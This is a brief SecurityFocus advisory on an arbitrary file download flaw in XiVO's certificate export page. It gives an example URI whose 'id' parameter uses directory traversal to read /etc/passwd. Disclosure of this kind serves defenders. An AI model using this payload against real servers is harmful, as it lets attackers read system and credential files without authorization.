XiVO 'id' Parameter Arbitrary File Download Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/xivo/configuration/index.php/manage/certificate/?act=export&id=../../../../etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus